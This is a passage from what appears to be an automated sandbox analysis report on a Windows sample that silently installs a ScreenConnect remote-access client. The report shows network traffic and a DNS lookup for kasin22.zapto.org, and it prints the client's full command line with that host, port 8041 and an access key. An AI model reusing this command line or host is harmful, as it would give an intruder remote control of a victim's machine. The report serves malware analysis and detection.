                                                               IMAGE_DIRECTORY_ENTRY_IMPORT | 0x129c4 | 0x50 | .rdata
                                                               IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x16000 | 0x533080 | .rsrc
                                                               IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                               IMAGE_DIRECTORY_ENTRY_SECURITY | 0x546200 | 0x19c48 |
                                                               IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x54a000 | 0xea8 | .reloc
                                                               IMAGE_DIRECTORY_ENTRY_DEBUG | 0x11f20 | 0x70 | .rdata
                                                               IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                               IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                               IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                               IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x11e60 | 0x40 | .rdata
                                                               IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                               IMAGE_DIRECTORY_ENTRY_IAT | 0xd000 | 0x13c | .rdata
                                                               IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                               IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                               IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                               Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                               .text | 0x1000 | 0xb1af | 0xb200 | d9fa6da0baf4b869720be833223490cb | False | 0.6123156601123596 | data | 6.592039633797327 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                               .rdata | 0xd000 | 0x6078 | 0x6200 | 8b45a1035c0de72f910a75db7749f735 | False | 0.41549744897959184 | data | 4.786621464556291 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                               .data | 0x14000 | 0x11e4 | 0x800 | 1f4cc86b6735a74429c9d1feb93e2871 | False | 0.18310546875 | data | 2.265083745848167 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                               .rsrc | 0x16000 | 0x533080 | 0x533200 | 0cb59c276652808eb7200fdad38bae5b | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                               .reloc | 0x54a000 | 0xea8 | 0x1000 | a93b0f39998e1e69e5944da8c5ff06b1 | False | 0.72265625 | data | 6.301490309336801 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                               Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                               FILES | 0x163d8 | 0x86000 | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.39622565881529853
                                                               FILES | 0x9c3d8 | 0x1a4600 | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.5111637115478516
                                                               FILES | 0x2409d8 | 0x1ac00 | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.4415614047897196
                                                               FILES | 0x25b5d8 | 0x2ec320 | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.9812068939208984
                                                               FILES | 0x5478f8 | 0x1600 | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.3908025568181818
                                                               RT_MANIFEST | 0x548ef8 | 0x188 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5892857142857143
                                                               DLL | Import
                                                               mscoree.dll | CorBindToRuntimeEx
                                                               KERNEL32.dll | GetModuleFileNameA, DecodePointer, SizeofResource, LockResource, LoadLibraryW, LoadResource, FindResourceW, GetProcAddress, WriteConsoleW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, CreateFileW, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap
                                                               OLEAUT32.dll | VariantInit, SafeArrayUnaccessData, SafeArrayCreateVector, SafeArrayDestroy, VariantClear, SafeArrayAccessData
                                                               Language of compilation system | Country where language is spoken | Map
                                                               English | United States |
                                                               Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                               Nov 17, 2024 10:32:06.404378891 CET | 49714 | 8041 | 192.168.2.6 | 194.59.30.222
                                                               Nov 17, 2024 10:32:06.409332991 CET | 8041 | 49714 | 194.59.30.222 | 192.168.2.6
                                                               Nov 17, 2024 10:32:06.410316944 CET | 49714 | 8041 | 192.168.2.6 | 194.59.30.222
                                                               Nov 17, 2024 10:32:07.199896097 CET | 49714 | 8041 | 192.168.2.6 | 194.59.30.222
                                                               Nov 17, 2024 10:32:07.205755949 CET | 8041 | 49714 | 194.59.30.222 | 192.168.2.6
                                                               Nov 17, 2024 10:32:07.439279079 CET | 8041 | 49714 | 194.59.30.222 | 192.168.2.6
                                                               Nov 17, 2024 10:32:07.643366098 CET | 49714 | 8041 | 192.168.2.6 | 194.59.30.222
                                                               Nov 17, 2024 10:32:07.697129011 CET | 49714 | 8041 | 192.168.2.6 | 194.59.30.222
                                                               Nov 17, 2024 10:32:07.703073025 CET | 8041 | 49714 | 194.59.30.222 | 192.168.2.6
                                                               Nov 17, 2024 10:32:07.949614048 CET | 8041 | 49714 | 194.59.30.222 | 192.168.2.6
                                                               Nov 17, 2024 10:32:07.965214014 CET | 8041 | 49714 | 194.59.30.222 | 192.168.2.6
                                                               Nov 17, 2024 10:32:07.965274096 CET | 49714 | 8041 | 192.168.2.6 | 194.59.30.222
                                                               Nov 17, 2024 10:32:09.593555927 CET | 49714 | 8041 | 192.168.2.6 | 194.59.30.222
                                                               Nov 17, 2024 10:32:09.593605042 CET | 49714 | 8041 | 192.168.2.6 | 194.59.30.222
                                                               Nov 17, 2024 10:32:09.598721027 CET | 8041 | 49714 | 194.59.30.222 | 192.168.2.6
                                                               Nov 17, 2024 10:32:09.598753929 CET | 8041 | 49714 | 194.59.30.222 | 192.168.2.6
                                                               Nov 17, 2024 10:32:09.598846912 CET | 8041 | 49714 | 194.59.30.222 | 192.168.2.6
                                                               Nov 17, 2024 10:32:09.598865986 CET | 8041 | 49714 | 194.59.30.222 | 192.168.2.6
                                                               Nov 17, 2024 10:32:09.598886013 CET | 8041 | 49714 | 194.59.30.222 | 192.168.2.6
                                                               Nov 17, 2024 10:32:10.500570059 CET | 8041 | 49714 | 194.59.30.222 | 192.168.2.6
                                                               Nov 17, 2024 10:32:10.643399000 CET | 49714 | 8041 | 192.168.2.6 | 194.59.30.222
                                                               Nov 17, 2024 10:33:10.502857924 CET | 49714 | 8041 | 192.168.2.6 | 194.59.30.222
                                                               Nov 17, 2024 10:33:10.508097887 CET | 8041 | 49714 | 194.59.30.222 | 192.168.2.6
                                                               Nov 17, 2024 10:34:10.518495083 CET | 49714 | 8041 | 192.168.2.6 | 194.59.30.222
                                                               Nov 17, 2024 10:34:10.523865938 CET | 8041 | 49714 | 194.59.30.222 | 192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 17, 2024 10:32:06.355391026 CET | 52761 | 53 | 192.168.2.6 | 1.1.1.1
Nov 17, 2024 10:32:06.363802910 CET | 53 | 52761 | 1.1.1.1 | 192.168.2.6

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 17, 2024 10:32:06.355391026 CET | 192.168.2.6 | 1.1.1.1 | 0x76e3 | Standard query (0) | kasin22.zapto.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 17, 2024 10:32:06.363802910 CET | 1.1.1.1 | 192.168.2.6 | 0x76e3 | No error (0) | kasin22.zapto.org | | 194.59.30.222 | A (IP address) | IN (0x0001) | false


                                                              Target ID:0
                                                              Start time:04:31:59
                                                              Start date:17/11/2024
                                                              Path:C:\Users\user\Desktop\file.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\file.exe"
                                                              Imagebase:0xa10000
                                                              File size:5'635'656 bytes
                                                              MD5 hash:093B0062FBF8663736CED8F41859FF58
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.2163119833.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000000.2130060799.0000000000A26000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.2155397067.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:2
                                                              Start time:04:32:00
                                                              Start date:17/11/2024
                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi"
                                                              Imagebase:0xe10000
                                                              File size:59'904 bytes
                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:3
                                                              Start time:04:32:01
                                                              Start date:17/11/2024
                                                              Path:C:\Windows\System32\msiexec.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\msiexec.exe /V
                                                              Imagebase:0x7ff653460000
                                                              File size:69'632 bytes
                                                              MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:4
                                                              Start time:04:32:01
                                                              Start date:17/11/2024
                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding A716AADF688D387F4AEB51767417B70D C
                                                              Imagebase:0xe10000
                                                              File size:59'904 bytes
                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:5
                                                              Start time:04:32:01
                                                              Start date:17/11/2024
                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIE114.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6152593 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                              Imagebase:0xef0000
                                                              File size:61'440 bytes
                                                              MD5 hash:889B99C52A60DD49227C5E485A016679
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:6
                                                              Start time:04:32:03
                                                              Start date:17/11/2024
                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 62F8343635E97A7D5BEDC1A49E3625BE
                                                              Imagebase:0xe10000
                                                              File size:59'904 bytes
                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:7
                                                              Start time:04:32:04
                                                              Start date:17/11/2024
                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 3CDFD6ECE8056A2339D8E63B556C7FE0 E Global\MSI0000
                                                              Imagebase:0xe10000
                                                              File size:59'904 bytes
                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:8
                                                              Start time:04:32:04
                                                              Start date:17/11/2024
                                                              Path:C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=kasin22.zapto.org&p=8041&s=87beefcf-9aa1-4c84-85bf-0153032d6d5b&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&c=Traffic%20Test&c=&c=&c=&c=&c=&c=&c="
                                                              Imagebase:0xb00000
                                                              File size:95'520 bytes
                                                              MD5 hash:361BCC2CB78C75DD6F583AF81834E447
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Antivirus matches:
                                                              • Detection: 0%, ReversingLabs
                                                              • Detection: 3%, Virustotal, Browse
                                                              Reputation:moderate
                                                              Has exited:false

                                                              Target ID:9
                                                              Start time:04:32:05
                                                              Start date:17/11/2024
                                                              Path:C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "60081e8a-4d58-45ec-97b7-8f04b030d7f4" "User"
                                                              Imagebase:0x950000
                                                              File size:601'376 bytes
                                                              MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000000.2196014508.0000000000952000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000002.3392174323.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                              Antivirus matches:
                                                              • Detection: 0%, ReversingLabs
                                                              Reputation:moderate
                                                              Has exited:false

                                                              Target ID:10
                                                              Start time:04:32:07
                                                              Start date:17/11/2024
                                                              Path:C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "355be41b-df8e-4504-845b-0f4583aafa5e" "System"
                                                              Imagebase:0xf00000
                                                              File size:601'376 bytes
                                                              MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000002.2240241661.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:moderate
                                                              Has exited:true

                                                                Similarity
                                                                • API ID:
                                                                • String ID: s/[m^
                                                                • API String ID: 0-905009785
                                                                • Opcode ID: fcc827524e9fd62fed55eea082ab9d37b34fbf356dba51b6631db5297bff5d32
                                                                • Instruction ID: 53ba9df2fdd8f829ffbe49d6211550f8d76d2a91ccd72770e712199702451533
                                                                • Opcode Fuzzy Hash: fcc827524e9fd62fed55eea082ab9d37b34fbf356dba51b6631db5297bff5d32
                                                                • Instruction Fuzzy Hash: F8115E713003059B9705EB69E8949AEBBF6FBC5250740862DD5258B340EF70AD05CBA8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2162795298.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_59e0000_file.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: q
                                                                • API String ID: 0-4110462503
                                                                • Opcode ID: 1693d0cfdf585d4cf86f4c2b0f3375509c3657082de6a7f7ae99f7296278b703
                                                                • Instruction ID: 90997ba8469a67a4839bd7e0b85f7d42d34edc83ea47d02c5f79a57deb85e652
                                                                • Opcode Fuzzy Hash: 1693d0cfdf585d4cf86f4c2b0f3375509c3657082de6a7f7ae99f7296278b703
                                                                • Instruction Fuzzy Hash: 3BF082B6A0D3800FC312C728C829654BF709FA7211F1D80EBD8558F3E7DA269817C752
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2162917409.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5a00000_file.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: da21523fb484ca1613e2d70923443d9324f6732962d23647e19e6ce6f8711362
                                                                • Instruction ID: 2e993192dee1a6f8c7db5ed4830a475b85d3ab70da55d39e0f3d2ac759e9dfd9
                                                                • Opcode Fuzzy Hash: da21523fb484ca1613e2d70923443d9324f6732962d23647e19e6ce6f8711362
                                                                • Instruction Fuzzy Hash: EFD17F71A002099FCB55DFA9D884AEEBBF6FF88310F158029E415E7391DB34AC41CBA1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2162917409.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5a00000_file.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e8dfc27bffafe467bb0fc2d84c90a9504a9947554f1e765bb7f66e4d7d9cd068
                                                                • Instruction ID: 3bb27dd545420127fc2a5209600a73cbc0e2c3f1c9396d6fbfe831f008c03a16
                                                                • Opcode Fuzzy Hash: e8dfc27bffafe467bb0fc2d84c90a9504a9947554f1e765bb7f66e4d7d9cd068
                                                                • Instruction Fuzzy Hash: C6E15C34A00605CFCB05DF68D984EAAB7F2FF88300B55C569E9069B3A5EB30ED45CB94
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2162917409.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5a00000_file.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 73722a589478b13ac55b8ab3d346c456e48056d101059e5969b283302c70065f
                                                                • Instruction ID: bf3b66d23ffa6bf4ed181712529449b2877bb6338148d724d888690ce3807e0d
                                                                • Opcode Fuzzy Hash: 73722a589478b13ac55b8ab3d346c456e48056d101059e5969b283302c70065f
                                                                • Instruction Fuzzy Hash: 54B17035B102049FCB18EB69D894AAEB7F3EFC8310F548429D416AB384DF34AC42CB94
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2154141521.0000000003040000.00000040.00000800.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_3040000_file.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f7141df44b17db91728dde73a160f69e1ee645f32c19908aec65a646ee652091
                                                                • Instruction ID: b6afd40b0f114aeaab0f504b0f93445a77ae4cae47616cbc78b057b6581d5ece
                                                                • Opcode Fuzzy Hash: f7141df44b17db91728dde73a160f69e1ee645f32c19908aec65a646ee652091
                                                                • Instruction Fuzzy Hash: 16C1E575A0120ADFCF01CF98C9808AEBBF6FF49314B2484A9E955A7351D731ED56CBA0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2162795298.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_59e0000_file.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f12b333ea315c17888ff394e4b7c2b725a444545213add081ab90f452141f2e7
                                                                • Instruction ID: 6916d3fd85052bb28b80fc9457a64a5e88a0bbc36bb0a26540830b3ba86dc785
                                                                • Opcode Fuzzy Hash: f12b333ea315c17888ff394e4b7c2b725a444545213add081ab90f452141f2e7
                                                                • Instruction Fuzzy Hash: 93C1D274A006059FCB14DFA8C884EAAB7F6FF88314F55C559E919AB3A1DB30EC41CB60
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2162917409.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5a00000_file.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6bfc2288893dd17bd5bfaad341e002e3b2cb27e5cebe3b5d4d56179f7ee31b9b
                                                                • Instruction ID: e0f197fda1d1210254922545aed5bbc86745eaa749ebe8350e17985f2e27eca1
                                                                • Opcode Fuzzy Hash: 6bfc2288893dd17bd5bfaad341e002e3b2cb27e5cebe3b5d4d56179f7ee31b9b
                                                                • Instruction Fuzzy Hash: D0C15D34600615CFCB05DF58C984DBABBF2FF84304B568999E4469B2A6DB30FD46CB94
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2162795298.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_59e0000_file.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cb524002b09b1b2ab7bf692927d1e67bf275778d9a98a07a644f06624bce7b62
                                                                • Instruction ID: 5ccd6a1df45a32fe53a91f6a5e1f88d06c61ed0ac2c722d01bdf5c05cf061a6d
                                                                • Opcode Fuzzy Hash: cb524002b09b1b2ab7bf692927d1e67bf275778d9a98a07a644f06624bce7b62
                                                                • Instruction Fuzzy Hash: 57A16F70B056069FDB25EF64C890A6FB7A3FB88200F548969D506DB385DB34EC42CBA5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2162795298.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_59e0000_file.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 291dd0d74732348bd4c8c4bda975646264bdda6fad3e852d2de907187a5444db
                                                                • Instruction ID: f57cd1f805afd5bcf8acf8fb07abcdb5345453ce3f660e743d20aa7f58c1c134
                                                                • Opcode Fuzzy Hash: 291dd0d74732348bd4c8c4bda975646264bdda6fad3e852d2de907187a5444db
                                                                • Instruction Fuzzy Hash: 06B19775600605DFC725CF68C884A6AFBF6FF88301B588969E54A9B761C731FC42CBA0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2162795298.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_59e0000_file.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 96934ae1c8ffc59cf2dbc058cfe856bed3f6b5ff0dc9f5acc43d8d3bcfd3b179
                                                                • Instruction ID: 77c38c11492fa53f142ec0f3e0c7029d1ba096df08ac5226c9ef7df977321ad2
                                                                • Opcode Fuzzy Hash: 96934ae1c8ffc59cf2dbc058cfe856bed3f6b5ff0dc9f5acc43d8d3bcfd3b179
                                                                • Instruction Fuzzy Hash: 1BA1E534B00205CFDB15DFA8C594AAEBBF6FF89300B5485A9E506AB364DB35EC41DB90
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2162795298.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_59e0000_file.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9ad4772991dd73d82f6c7abde8a62597ca12f304e931fe49bf495dee0c84edde
                                                                • Instruction ID: 332b3e1b638e6be34c0406c98fd530f080399aa91d04a0110e076844974d5d0b
                                                                • Opcode Fuzzy Hash: 9ad4772991dd73d82f6c7abde8a62597ca12f304e931fe49bf495dee0c84edde
                                                                • Instruction Fuzzy Hash: 0D91E634B00215CFCB15DFA8D994AAEBBF6FF89300B5485A8E506AB364DB31EC41DB50
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2162917409.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5a00000_file.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5323c232c9f491dbb312afc236d4720fefd8f7900d19ae5bc81858a1077c5c28
                                                                • Instruction ID: f93afd523062cdb8815068f509cd7ec8c8accea341e8a479ede54fe04a0179d3
                                                                • Opcode Fuzzy Hash: 5323c232c9f491dbb312afc236d4720fefd8f7900d19ae5bc81858a1077c5c28
                                                                • Instruction Fuzzy Hash: F581E430B002518FCB15DF69D884E6ABBB2EF84320F19C599E855DB392DB30EC02CB90
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2154141521.0000000003040000.00000040.00000800.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_3040000_file.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5850a0f0f884c558da042c148206e24581e1feb54f8204c66760b9a9c6ddb7e5
                                                                • Instruction ID: 0757469801742d28faffcf0b0894a6fa1b3247d48a5e43869dcfd693d3ccf136
                                                                • Opcode Fuzzy Hash: 5850a0f0f884c558da042c148206e24581e1feb54f8204c66760b9a9c6ddb7e5
                                                                • Instruction Fuzzy Hash: C0914B74B002059FDB15DFA9D998A6EBBF2FF88340B148569E916DB354EF70AD02CB40
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2162795298.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_59e0000_file.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ae2b51151e1ff4f81b01866b19279204d9dd6bbbe4173a86ef7a7ff6e804dff7
                                                                • Instruction ID: 460da9dcfa2a144a968b820260d18bbf8be1d4b61984c819ad70ab0d03bee0eb
                                                                • Opcode Fuzzy Hash: ae2b51151e1ff4f81b01866b19279204d9dd6bbbe4173a86ef7a7ff6e804dff7
                                                                • Instruction Fuzzy Hash: B9611531B016158FDB269B65D85067EBBBBFFC8720B20842AE546DB341DF319842C7A1
                                                                Memory Dump Source
